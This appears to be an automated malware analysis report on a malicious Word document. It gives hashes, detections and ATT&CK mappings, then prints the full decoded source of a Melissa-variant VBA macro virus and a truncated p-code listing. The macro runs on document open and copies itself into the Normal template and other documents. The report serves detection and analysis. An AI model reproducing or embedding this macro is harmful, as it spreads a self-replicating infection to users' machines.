Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4968a2cac22f9759…

MALICIOUS

Office (OLE)

28.5 KB Created: 2000-01-29 17:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 22d9248399e99c098c20aa0b07c43659 SHA-1: 7cfe0fb517beb6a3a5275017e32668dea13dd86d SHA-256: 4968a2cac22f9759954202526ca07f7687cc58ab499f2688857186ba9aad5197
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to copy itself into the Normal template and the active document, a common technique for establishing persistence or enabling further malicious actions. The presence of ClamAV detections for 'Doc.Trojan.Assilem-2' and 'Doc.Trojan.Venom-1' strongly indicates malicious intent, likely related to malware distribution.

Heuristics 3

  • ClamAV: Doc.Trojan.Assilem-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Assilem-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6878 bytes
SHA-256: 1643934f464e99a87689354b1051942cb2317ad3ce659075af7ad6bcd249c7ca
Detection
ClamAV: Doc.Trojan.Venom-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
''Works in both Word 2000 and Word 97
''Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub


' Processing file: /opt/analyzer/scan_staging/43cc9ca65f344e2f89308c93286d8b50.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Melissa - 3652 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ADI1 
' Line #2:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set NTI1 
' Line #3:
' 	Ld NTI1 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St NTCL 
' Line #4:
' 	Ld ADI1 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St ADCL 
' Line #5:
' 	LitDI2 0x0002 
' 	St BGN 
' Line #6:
' 	Ld ADI1 
' 	MemLd New 
' 	LitStr 0x0007 "Melissa"
' 	Ne 
' 	IfBlock 
' Line #7:
' 	LineCont 0x0004 05 00 00 00
' 	Ld ADCL 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld ADCL 
' 	Ld ADI1 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' 	EndIf 
' Line #8:
' 	SetStmt 
' 	Ld ADI1 
' 	Set ToInfect 
' Line #9:
' 	LitStr 0x0007 "Melissa"
' 	Ld ADI1 
' 	MemSt New 
' Line #10:
' 	LitVarSpecial (True)
' 	St DoAD 
' Line #11:
' 	EndIfBlock 
' Line #12:
' 	Ld NTI1 
' 	MemLd New 
' 	LitStr 0x0007 "Melissa"
' 	Ne 
' 	IfBlock 
' Line #13:
' 	LineCont 0x0004 05 00 00 00
' 	Ld NTCL 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld NTCL 
' 	Ld NTI1 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' 	EndIf 
' Line #14:
' 	SetStmt 
' 	Ld NTI1 
' 	Set ToInfect 
' Line #15:
' 	LitStr 0x0007 "Melissa"
' 	Ld NTI1 
' 	MemSt New 
' Line #16:
' 	LitVarSpecial (True)
' 	St DoNT 
' Line #17:
' 	EndIfBlock 
' Line #18:
' 	Ld DoNT 
' 	LitVarSpecial (True)
' 	Ne 
' 	Ld DoAD 
' 	LitVarSpecial (True)
' 	Ne 
' 	And 
' 	If 
' 	BoSImplicit 
' 	GoTo CYA 
' 	EndIf 
' Line #19:
' 	Ld DoNT 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ADI1 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	DoWhile 
' Line #21:
' 	Li
... (truncated)